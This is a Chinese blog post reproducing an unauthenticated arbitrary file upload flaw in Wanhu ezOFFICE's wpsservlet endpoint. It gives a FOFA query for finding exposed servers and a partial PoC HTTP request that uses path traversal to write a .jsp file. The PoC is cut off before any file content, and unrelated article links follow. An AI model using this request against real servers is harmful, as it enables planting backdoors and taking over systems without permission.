万户ezOFFICE wpsservlet任意文件上传漏洞复现

0x01 产品简介

 万户OA ezoffice是万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品,统一的基础管理平台,实现用户数据统一管理、权限统一分配、身份统一认证。统一规划门户网站群和协同办公平台,将外网信息维护、客户服务、互动交流和日常工作紧密结合起来,有效提高工作效率。

0x02 漏洞概述

 万户ezOFFICE协同管理平台wpsservlet接口处存在任意文件上传漏洞,未经身份认证的攻击者可以通过此漏洞上传恶意后门文件,造成代码执行或服务器失陷。

0x03 复现环境

FOFA:app="万户网络-ezOFFICE"

0x04 漏洞复现 

PoC

POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=1&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/1

相关推荐

最近更新

  1. TCP协议是安全的吗?

    2023-12-08 03:48:04       16 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2023-12-08 03:48:04       16 阅读
  3. 【Python教程】压缩PDF文件大小

    2023-12-08 03:48:04       15 阅读
  4. 通过文章id递归查询所有评论(xml)

    2023-12-08 03:48:04       18 阅读

热门阅读

  1. 算法基础之n-皇后问题

    2023-12-08 03:48:04       44 阅读
  2. 如何使用PDCA循环来提升软件产品的质量

    2023-12-08 03:48:04       33 阅读
  3. 股票怎么加杠杆买入

    2023-12-08 03:48:04       31 阅读
  4. Web3之L2 ZK-Rollup 方案-StarkNet

    2023-12-08 03:48:04       38 阅读
  5. 存储过程与视图

    2023-12-08 03:48:04       36 阅读
  6. 【UGUI】实现UGUI背包系统的六个主要交互功能

    2023-12-08 03:48:04       39 阅读